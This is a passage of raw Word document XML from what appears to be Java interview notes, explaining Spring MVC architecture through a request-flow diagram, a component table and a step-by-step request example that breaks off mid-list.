    <w:p w14:paraId="58063F93" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00301ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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boot: Simplifies project setup and development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C1C884" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A423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EA2962">
          <v:rect id="_x0000_i2041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDDFB9D" w14:textId="77777777" w:rsidR="00A42353" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42353" w:rsidP="00A42353">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EBA4A24" w14:textId="38326581" w:rsidR="006513B8" w:rsidRPr="00CE4B95" w:rsidRDefault="006513B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="423" w:name="_Toc196307903"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Spring MVC architecture?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="423"/>
    </w:p>
    <w:p w14:paraId="310AF2F6" w14:textId="59D31F61" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="00EF08E5">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pring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Model-View-Controller) is a part of the Spring Framework used to build </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It separates the application into three main components — Model, View, and Controller — to simplify development and promote clean code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1787E2" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AB3F0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8BA7367">
          <v:rect id="_x0000_i2042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1E85F" w14:textId="77777777" w:rsidR="002E4600" w:rsidRPr="00CE4B95" w:rsidRDefault="002E4600" w:rsidP="00AB3F04">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC4ABA2" w14:textId="2DA213E4" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="00AB3F04">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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spring MVC Architecture Diagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A41C330" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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rowser (Client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA1275" w14:textId="0795E92E" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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r w:rsidR="005B29EC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2DC74" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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1] DispatcherServlet (Front Controller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960590F" w14:textId="1D1F4415" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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r w:rsidR="005B29EC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7045654B" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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2] HandlerMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314BEE13" w14:textId="5383A036" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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r w:rsidR="005B29EC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9243F" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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3] Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F05A75" w14:textId="7BA61580" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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r w:rsidR="005B29EC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CAFE9D" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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4] Service Layer (Business Logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2196AB26" w14:textId="197CE882" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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r w:rsidR="005B29EC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3089AD" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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5] DAO Layer (Database Access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1E8684" w14:textId="1840F8D6" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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r w:rsidR="005B29EC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771B5988" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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6] Model (Data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F469F9A" w14:textId="53AF8B46" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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r w:rsidR="005B29EC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0365D80D" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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7] View Resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E1CFF" w14:textId="2AFC1025" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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r w:rsidR="005B29EC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B5E45" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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8] View (JSP/HTML/Thymeleaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C4BD1" w14:textId="23042745" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="006A4CE4">
      <w:pPr>
        <w:ind w:left="216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r w:rsidR="005B29EC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA56718" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="0051728A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="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sponse sent to Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7670D935" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AB3F0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3EA260F">
          <v:rect id="_x0000_i2043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249D01F" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="00AB3F04">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mponents Explain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7"/>
        <w:gridCol w:w="8077"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="1C8CEE0B" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44C2177E" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="00CB5A9A">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ponent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8032" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="650C1BA1" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="00CB5A9A">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AB3F04" w:rsidRPr="00CE4B95" w14:paraId="12844D99" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6594EDD1"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1. DispatcherServlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8032" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D745241"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central component of Spring MVC. It receives all HTTP requests and delegates to the appropriate controller.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="7782BD21" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78A1B315"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2. HandlerMapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8032" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E6017EC"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termines which controller should handle the request based on URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="21012D7B" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9E99B1"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3. Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8032" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="787AFB22"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ocesses the request, calls the business logic, and returns a ModelAndView object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="0FADF4B4" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="453A9157"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4. Service Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8032" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E67F48"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tains business logic and handles processing of data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="2A53DC29" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F91677F"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5. DAO Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8032" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="283C3F44"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municates with the database using technologies like JPA, JDBC, or Hibernate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="0BCDC85A" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E31DD2B"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6. Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8032" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09FEB761"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olds data returned from the controller and passed to the view.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="24BB5744" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="708BDC70"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7. ViewResolver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8032" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4094BA49"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solves logical view names (like "home") to actual views (like home.jsp).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w14:paraId="7D8C9B9B" w14:textId="77777777" w:rsidTr="00D84C71">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2082" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="420F8FE3"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8. View</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8032" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A0FDC8A"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nders the final output to the client (JSP, Thymeleaf, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="163A84B8" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00AB3F0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8C30003">
          <v:rect id="_x0000_i2044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02409D" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04" w:rsidP="00AB3F04">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equest Flow Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1775A29A" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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lient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends a request (e.g., /getEmployee).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EBA013" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ispatcherServlet receives it and checks HandlerMapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868C03B" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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appropriate @Controller method is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A394A4" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ontroller interacts with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service</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DAO</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8A1F0F" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Data is placed in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6673B" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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troller returns a logical view name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4301AD" w14:textId="77777777" w:rsidR="00AB3F04" w:rsidRPr="00CE4B95" w:rsidRDefault="00AB3F04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
